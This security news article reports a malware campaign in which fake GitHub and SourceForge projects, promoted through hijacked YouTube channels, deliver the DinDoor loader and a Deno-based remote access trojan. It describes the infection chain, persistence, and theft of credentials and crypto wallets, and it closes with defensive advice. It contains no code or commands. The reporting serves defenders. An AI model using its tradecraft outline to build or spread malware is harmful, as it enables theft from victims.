Fake GitHub, SourceForge installers deliver DinDoor and Deno RAT

Security researchers found attackers using compromised YouTube channels to redirect viewers to fake projects on GitHub and SourceForge. The repositories and linked installers impersonated popular tools and plugins to lure creators, gamers and AI users into running MSI files or copying terminal commands. The videos and repositories together have attracted more than 50,000 views.

The infection chain begins when users follow links in YouTube descriptions to GitHub or SourceForge repositories. Those repositories instruct users to run commands that download MSI installers or execute PowerShell scripts. The MSI droppers write command and PowerShell files to disk; the scripts then ensure Windows package managers are present and use them to install the official Deno runtime.

After Deno is installed, the Deno executable fetches a small launcher from a command-and-control server. That launcher retrieves and evaluates additional JavaScript stages in memory. The loader identified in the analysis is known as DinDoor. DinDoor registers a RUN key to achieve persistence, sends system details to the C2 server, and pulls further payloads without writing those stages to disk.

One of the delivered payloads is a Deno-based remote access trojan. The RAT supports remote shell and PowerShell commands, file listing and retrieval, screenshot capture, clipboard read and modification, and execution of arbitrary binaries. Its data-stealing features target credentials and data from Chromium-based browsers and from more than 50 crypto wallet extensions and folders tied to wallet software such as Atomic Wallet, Exodus and Electrum. The RAT can also extract data from messaging clients including Telegram and Discord and create SOCKS5 proxy tunnels over WebSocket for additional access.

The RAT includes a peer-to-peer streaming mode that uses Microsoft Edge to carry live video. The agent spawns a hidden Edge process, connects via the Chrome DevTools Protocol, injects a small WebRTC page, encodes the victim’s screen as H.264, and sends frames directly to an operator’s browser over an encrypted WebRTC DataChannel. Signaling for the direct link is exchanged over the existing C2 WebSocket so the video stream does not transit the C2 server.

Researchers observed fake projects that mimicked ChatGPT, Claude, AutoTune, Kontakt and other software. Examples of malicious links include a GitHub repository for a fake Claude plugin and SourceForge project pages that impersonated a game installer and an AI watermark remover. Security teams reported the repositories and some were removed; researchers warn new accounts and repos continue to appear.

The researchers published technical indicators and recommend downloading software only from official vendor sites, avoiding unofficial or cracked builds, checking developer profiles and repository histories, and verifying digital signatures and publisher information on Windows installers.